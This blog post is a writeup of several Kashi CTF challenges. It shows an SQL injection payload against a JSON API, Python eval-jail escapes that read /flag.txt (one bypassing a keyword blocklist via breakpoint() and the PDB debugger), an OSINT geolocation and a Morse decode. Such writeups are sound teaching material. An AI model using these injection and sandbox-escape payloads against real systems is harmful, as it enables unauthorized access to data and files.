Homepage

CTF writeups and such.

View My GitHub Profile

28 February 2025

Kashi CTF Writeup

by kejcao

Web

Corporate Life 1

Examining the _buildManifest.js we see the directory /v2-testing which fetches /api/list-v2 where the request payload is JSON with a filter value that is suspectible to SQL injection. Sending ' or 1=1-- yields lots of JSON, with the flag in one of the entries:

...
	{
		"employee_name": "peter.johnson",
		"request_detail": "Shitty job, I hate working here, I will leak all important information like KashiCTF{s4m3_old_c0rp0_l1f3_8oMKsKIH}",
		"status": "denied",
		"department": "Logistics",
		"role": "Supply Chain Manager",
		"email": "peter.johnson@corp.com"
	},
...

OSINT

Who am I ??

picture

Immediately we know that we are in Budapest, Hungary because of the particular phone number visible on the storefront. Looking up the domain of the email address dh.hu, we are led to a website for Duna House. Looking up “bazilika” Duna House on Google leads to the store, which is on the street “Bajcsy-Zsilinszky” apparently named after the politician “Endre Kálmán Bajcsy-Zsilinszky.” Trying a bunch of different name orders, KashiCTF{Endre_Bajcsy_Zsilinszky} is our flag.

MISC

Easy Jail

Notice the unsafe use of eval() in the following Python code,

def calc(op):
	try : 	
		res = eval(op)
	except :
		return print("Wrong operation")
	return print(f"{op} --> {res}")

def main():
	while True :
		inp = input(">> ")
		calc(inp)

Entering open('/flag.txt').read() gets the flag KashiCTF{3V4L_41NT_54F3_Pn0q6Yii}.

Easy Jail 2

This is the same as the last challenge, but there’s a blacklist of words we cannot use, such that if the input string contains as a substring one of these sequences, then the program ignores the request:

["open", "input", "eval", "exec", "import", "getattr", "sh", "builtins", "global"]

Luckily, breakpoint() is not blocked. So, we can spawn a PDB debugger and evaluate our expression in there.

kjc@kjc:~$ nc kashictf.iitbhucybersec.in 58823
           _            _       _
          | |          | |     | |
  ___ __ _| | ___ _   _| | __ _| |_ ___  _ __
 / __/ _` | |/ __| | | | |/ _` | __/ _ \| '__|
| (_| (_| | | (__| |_| | | (_| | || (_) | |
 \___\__,_|_|\___|\__,_|_|\__,_|\__\___/|_|
>> breakpoint()
--Return--
> <string>(1)<module>()->None
(Pdb) p open('/flag.txt').read()
'KashiCTF{C4N_S71LL_CL3AR_8L4CKL15T_6UyAkh7s}\n'
(Pdb)

Crypto

Lost Frequencies

We are given this:

111 0000 10 111 1000 00 10 01 010 1011 11 111 010 000 0

Where 1 is long, 0 is short so we can just decode the morse code to get the string “ohnobinarymorse”.

tags: